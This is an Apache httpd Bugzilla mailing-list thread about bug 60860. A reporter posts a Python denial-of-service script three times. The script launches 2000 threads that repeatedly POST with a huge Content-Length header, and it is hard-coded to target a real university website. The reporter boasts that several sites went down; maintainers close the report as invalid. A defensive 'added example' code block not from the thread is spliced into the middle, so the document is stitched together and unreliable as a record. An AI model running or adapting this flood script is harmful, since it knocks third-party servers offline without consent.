Posted to bugs@httpd.apache.org by bu...@apache.org on 2017/03/14 05:46:23 UTC
[Bug 60860] New: Apache httpd Dos Bug
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
Bug ID: 60860
Summary: Apache httpd Dos Bug
Product: Apache httpd-2
Version: 2.4.25
Hardware: PC
Status: NEW
Severity: normal
Priority: P2
Component: All
Assignee: bugs@httpd.apache.org
Reporter: buch0b2@gmail.com
Target Milestone: ---
Created attachment 34819
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34819&action=edit
poc
for num in range(2000):
    buf += "AAAAA"
headers = {'Content-Length': str(0xFFFFFFFFFFFF),'Content-Type': 'text/html'}
If the buffer is over 10000 in size, it allows setting an arbitrary Content-Length, so loop the
program and the connection becomes slow or dead.
Try to run the poc.
Thanks.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Vulnerability
William A. Rowe Jr. <wr...@apache.org> changed:
What |Removed |Added
----------------------------------------------------------------------------
Resolution|--- |INVALID
Status|UNCONFIRMED |RESOLVED
--- Comment #13 from William A. Rowe Jr. <wr...@apache.org> ---
Closing per reporter comment #12
[Bug 60860] Apache httpd Dos Bug
--- Comment #2 from buch0 <bu...@gmail.com> ---
Comment on attachment 34819
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34819
poc
> #! /usr/bin/env python
>
>import httplib,urllib
>import time
>import sys
>import threading
>import subprocess
>import random
>
>aurl = ""
>aport = 0
>
>def send_request(method, url, path):
>    try:
>
>        c = httplib.HTTPConnection(url, aport)
>
>        buf = ""
>        for num in range(2000):
>            buf += "AAAAA"
>
>        headers = {'Content-Length': str(0xFFFFFFFFFFF),'Content-Type': 'text/html','User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36'}
>
>        params = urllib.urlencode({'bitch': buf})
>        c.request(method,path,body=params,headers=headers);
>
>        print c.getresponse().read()
>        c.close()
>    except Exception, e:
>        print "fuck"
>        pass
>
>def requests():
>    while True:
>        send_request("POST", aurl, "")
>
>aurl = "www.kagawa-u.ac.jp"
>aport = 80
>
>for num in range(2000):
>    threading.Thread(target=requests).start()
[Bug 60860] Apache httpd Dos Vulnerability
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Summary|Apache httpd Dos Bug |Apache httpd Dos Vulnerability
[Bug 60860] Apache httpd Dos Bug
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
OS| |All
--- Comment #6 from buch0 <bu...@gmail.com> ---
Please look at poc2. poc was missed.
[Bug 60860] Apache httpd Dos Bug
--- Comment #1 from buch0 <bu...@gmail.com> ---
Comment on attachment 34819
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34819
poc
> #! /usr/bin/env python
>
>import httplib,urllib
>import time
>import sys
>import threading
>import subprocess
>import random
>
>aurl = ""
>aport = 0
>
>def send_request(method, url, path):
>    try:
>
>        c = httplib.HTTPConnection(url, aport)
>
>        buf = ""
>        for num in range(2000):
>            buf += "AAAAA"
>
>        headers = {'Content-Length': str(0xFFFFFFFFFFF),'Content-Type': 'text/html','User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36'}
>
>        params = urllib.urlencode({'bitch': buf})
>        c.request(method,path,body=params,headers=headers);
>
>        print c.getresponse().read()
>        c.close()
>    except Exception, e:
>        print "fuck"
>        pass
>
>def requests():
>    while True:
>        send_request("POST", aurl, "")
>
>aurl = "www.kagawa-u.ac.jp"
>aport = 80
>
>for num in range(2000):
>    threading.Thread(target=requests).start()
[Bug 60860] Apache httpd Dos Bug
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
CC| |apache@gagravarr.org
[Bug 60860] Apache httpd Dos Bug
--- Comment #11 from buch0 <bu...@gmail.com> ---
Movie: https://www.youtube.com/watch?v=acQrNO5g1Qo
[Bug 60860] Apache httpd Dos Bug
Eric Covener <co...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Resolution|--- |INVALID
Status|NEW |RESOLVED
--- Comment #8 from Eric Covener <co...@gmail.com> ---
yes, 2000 threads in an application that buffers large inputs is expensive, but
we don't consider it a vulnerability in the server. We also don't expect
vulnerabilities to be reported on public bugzilla.
[Bug 60860] Apache httpd Dos Bug
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
CC| |buch0b2@gmail.com, vinci@protonmail.ch
[Bug 60860] Apache httpd Dos Bug
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
CC|apache@gagravarr.org |
[Bug 60860] Apache httpd Dos Vulnerability
--- Comment #12 from buch0 <bu...@gmail.com> ---
Oops, it's not a bug, sorry, plz close.
[Bug 60860] Apache httpd Dos Bug
--- Comment #3 from buch0 <bu...@gmail.com> ---
Comment on attachment 34819
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34819
poc
> #! /usr/bin/env python
>
>import httplib,urllib
>import time
>import sys
>import threading
>import subprocess
>import random
>
>aurl = ""
>aport = 0
>
>def send_request(method, url, path):
>    try:
>
>        c = httplib.HTTPConnection(url, aport)
>
>        buf = ""
>        for num in range(2000):
>            buf += "AAAAA"
>
>        headers = {'Content-Length': str(0xFFFFFFFFFFF),'Content-Type': 'text/html','User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36'}
>
>        params = urllib.urlencode({'bitch': buf})
>        c.request(method,path,body=params,headers=headers);
>
>        print c.getresponse().read()
>        c.close()
>    except Exception, e:
>        print "fuck"
>        pass
>
>def requests():
>    while True:
>        send_request("POST", aurl, "")
>
>aurl = "www.kagawa-u.ac.jp"
>aport = 80
>
>for num in range(2000):
>    threading.Thread(target=requests).start()
[Bug 60860] Apache httpd Dos Bug
--- Comment #10 from buch0 <bu...@gmail.com> ---
I already tried this poc on some sites, these were down!
It's a bug!
[Bug 60860] Apache httpd Dos Bug
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Resolution|INVALID |---
Ever confirmed|1 |0
Status|RESOLVED |UNCONFIRMED
--- Comment #9 from buch0 <bu...@gmail.com> ---
(In reply to Eric Covener from comment #8)
> yes, 2000 threads in an application that buffers large inputs is expensive,
> but we don't consider it a vulnerability in the server. We also don't
> expect vulnerabilities to be reported on public bugzilla.
Hey girl, please remove 'Content-Length': str(0xFFFFFFFFFFF), from the headers
and try it out. It doesn't go down. If you add 'Content-Length': str(0xFFFFFFFFFFF), to
the headers, the site will go down (if you try it on localhost, it will go down).
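Added example (not code from the bug report or from httpd) of what a server-side body reader should do with the request the reporter describes: a POST whose Content-Length header is far larger than the roughly 10 KB body actually sent. It refuses the declared length up front when it exceeds a cap and gives up when the body stalls, so a worker is not held open indefinitely; the cap, the timeout and the socketpair harness are constructed for the demo.

```python
"""Server-side handling of a declared Content-Length far larger than the body.

Added example: not code from the bug report or from httpd. A body reader
should refuse up front when the declared length exceeds a cap (httpd's
LimitRequestBody) and give up when the body stops arriving (httpd's
mod_reqtimeout). Limits below are constructed for the demo.
"""
import socket

MAX_BODY = 1 << 20        # 1 MiB cap on declared Content-Length (constructed)
READ_TIMEOUT = 0.5        # seconds to wait for the next body bytes (constructed)


def read_body(conn, declared_len, max_body=MAX_BODY, timeout=READ_TIMEOUT):
    """Return (status, body): 413 if declared_len exceeds the cap, 408 if
    the peer stalls before sending declared_len bytes, 400 on early close,
    otherwise 200."""
    if declared_len < 0:
        return 400, b""
    if declared_len > max_body:
        # Refused before reading a single body byte; no worker time is spent.
        return 413, b""
    conn.settimeout(timeout)
    chunks, got = [], 0
    try:
        while got < declared_len:
            chunk = conn.recv(min(65536, declared_len - got))
            if not chunk:                     # peer closed early
                return 400, b"".join(chunks)
            chunks.append(chunk)
            got += len(chunk)
    except socket.timeout:
        # Body stalled: the "slow or dead connection" the report describes.
        return 408, b"".join(chunks)
    return 200, b"".join(chunks)


def simulate(declared_len, max_body=MAX_BODY):
    """Client sends a 10 000-byte body (as the PoC does) and then goes silent;
    returns the status the server-side reader settles on."""
    client, server = socket.socketpair()
    try:
        client.sendall(b"A" * 10000)
        return read_body(server, declared_len, max_body)[0]
    finally:
        client.close()
        server.close()
```

With the cap in place the PoC's header value is rejected before any body is read; with the cap disabled the reader still releases the connection after the timeout instead of waiting for bytes that never come.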
[Bug 60860] Apache httpd Dos Bug
--- Comment #7 from buch0 <bu...@gmail.com> ---
idk if it is a bug... sorry, I am a noob, man
[Bug 60860] Apache httpd Dos Bug
--- Comment #5 from buch0 <bu...@gmail.com> ---
Created attachment 34821
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34821&action=edit
image
image of poc
[Bug 60860] Apache httpd Dos Bug
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
CC| |apache@gagravarr.org
[Bug 60860] Apache httpd Dos Bug
--- Comment #4 from buch0 <bu...@gmail.com> ---
Created attachment 34820
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34820&action=edit
poc2
poc2